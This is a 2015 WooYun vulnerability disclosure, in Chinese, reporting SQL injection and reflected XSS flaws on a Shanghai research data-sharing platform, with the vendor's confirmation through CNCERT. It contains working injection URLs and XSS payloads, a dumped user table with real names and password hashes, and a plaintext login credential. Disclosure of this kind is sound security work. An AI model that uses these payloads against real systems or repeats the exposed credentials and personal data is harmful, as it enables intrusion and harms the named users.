当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140553

漏洞标题:上海某数据共享平台sql注入与XSS打包

相关厂商:cncert国家互联网应急中心

漏洞作者: Aerfa21

提交时间:2015-09-15 11:22

修复时间:2015-11-01 15:34

公开时间:2015-11-01 15:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

RT

详细说明:

上海研发公共服务平台有效整合上海及长三角地区的科技资源,通过开放仪器设备与研究基地,共享科学数据和科技文献,提供专业技术、公益培训、专家咨询等服务,促进科技资...好久没交洞了,继续连载。
1 sql注入(无限制脱库),爆出用户密码和密码,不料认证通过后页面不存在

http://**.**.**.**/btin_cms/cnt/moreCount.do?
browseParam.channelName=%E4%BA%A7%E4%B8%9A%E5%8A%A8%E6%80%81&browseParam.channelName=%E4%BA%A7%E4%B8%9A%E6%94%BF%E7%AD%96%E6%B3%95%E8%A7
%84%E5%92%8C%E6%A0%87%E5%87%86&browseParam.templateName=BTIN_SUMMARY&browseParam.webSymbol=btin') AND (SELECT * FROM 
(SELECT(SLEEP(5)))UrFp) AND ('TwOE'='TwOE


sql1.png


Database: btin
Table: tb_cms_user
[18 columns]
+-------------------+---------------+
| Column            | Type          |
+-------------------+---------------+
| address           | varchar(500)  |
| availability_date | date          |
| check_articles    | int(10)       |
| created_date      | datetime      |
| creater           | int(10)       |
| description       | varchar(4000) |
| last_edit_time    | datetime      |
| last_login_time   | datetime      |
| login_count       | int(10)       |
| name              | varchar(50)   |
| organization      | varchar(500)  |
| password          | varchar(32)   |
| phone             | varchar(50)   |
| role              | varchar(20)   |
| status            | varchar(20)   |
| submit_articles   | int(10)       |
| true_name         | varchar(20)   |
| user_id           | int(10)       |
+-------------------+---------------+
Database: btin
Table: tb_cms_user
[15 entries]
+-------------+--------------------------+----------------------------------+-----------+---------+
| login_count | name                     | password                         | true_name | user_id |
+-------------+--------------------------+----------------------------------+-----------+---------+
| 3           | chen_jing100@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 陈静        | 32      |
| 8           | dqlv@**.**.**.**           | 96e79218965eb72c92a549dd5a330112 | yhju      | 33      |
| 626         | fhuang@**.**.**.**        | 96e79218965eb72c92a549dd5a330112 | 黄菲        | 27      |
| 1           | hwu01@**.**.**.**         | a8a3d0e05801ad8e60034365f5c3b6fd | 吴慧        | 19      |
| 2           | hywang1213@**.**.**.**    | 96e79218965eb72c92a549dd5a330112 | 王慧媛       | 15      |
| 51          | jgren@**.**.**.**          | 96e79218965eb72c92a549dd5a330112 | 任敬歌       | 23      |
| 160         | jiajia@**.**.**.**         | b10cbb6c51ac9ec77c8dc9f0bccdd296 | 贾佳        | 9       |
| 16          | jszhang@**.**.**.**        | b10cbb6c51ac9ec77c8dc9f0bccdd296 | 张建设       | 28      |
| 33          | lbgao@**.**.**.**   | 96e79218965eb72c92a549dd5a330112 | 高柳滨       | 26      |
| 232         | lifecenter@**.**.**.**     | 96e79218965eb72c92a549dd5a330112 | sdspb     | 1       |
| 148         | liuxiao@**.**.**.**       | 0f4237dd33c1e0d930180a402c5403d6 | 刘晓        | 14      |
| 63          | mhli@**.**.**.**    | 34018b24aaa7b894f2dee606c9edaf5f | 李明辉       | 18      |
| 85          | mhruan@**.**.**.**        | 4ddc1311251a0d11afa4696bec7829b3 | 阮梅花       | 13      |
| 4           | mrq@**.**.**.**     | fed86d76f8faeb4ff6e022315aa8251c | 毛汝倩       | 21      |
| 5           | xuerusp@**.**.**.**      | 96e79218965eb72c92a549dd5a330112 | 王冬冬       | 31      |
+-------------+--------------------------+----------------------------------+-----------+---------+


尝试登录,认证成功后页面不存在(什么情况?!)  chen_jing100@**.**.**.**:111111


sql2.png


2 XSS 

http://**.**.**.**:80/trace/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/primer/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/hotdata/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/taxonomy/en/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/nucleotide/en/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>


xss.png


漏洞证明:

1 SQL注入(可爆62家企业敏感信息)

注入参数为industry :  
http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90&org_name=1&PageNo=2


http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90&org_name=1' 
UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162716b71,0x61574876665276567442,0x716b787071)-- &PageNo=2


sql1.png


看看能不能得到很多敏感信息


sql2.png


sql3.png


2 XSS(非存储型)

http://**.**.**.**/web/changxing/changxing_fwlb.php?
industry=%25E4%25BF%25A1%25E6%2581%25AF%25E6%258A%2580%25E6%259C%25AF%27%22%28%29%26%25%3CScRiPt%20%3Ealert%28/xss1/
%29%3C/ScRiPt%3E&org_name=%E4%B8%8A%E6%B5%B7%E8%B6%85%E7%BA%A7%E8%AE%A1%E7%AE%97%E4%B8%AD%E5%BF%83


xss1.png


http://**.**.**.**/web/changxing/changxing_fwlb.php?
industry=%25E6%2596%25B0%25E8%2583%25BD%25E6%25BA%2590%27%22%28%29%26%25%3E%3CScRiPt%20%3Ealert%28/xss2/%29%3C/ScRiPt%3E
&org_name=%E4%B8%8A%E6%B5%B7%E5%A4%AA%E9%98%B3%E8%83%BD%E5%B7%A5%E7%A8%8B%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6%E4%B8%AD%E5%BF%83%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%EF%BC%88%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%AA%E9%98%B3%E8%83%BD%E5%85%89%E4%BC%8F%E6%8A%80%E6%9C%AF%E5%88%9B%E6%96%B0%E6%9C%8D%E5%8A%A1%E5%B9%B3%E5%8F%B0%EF%BC%89&PageNo=2


xss2.png


修复方案:

参数过滤

版权声明:转载请注明来源 Aerfa21@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-17 15:33

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。按多个风险评分,rank 12

最新状态:

暂无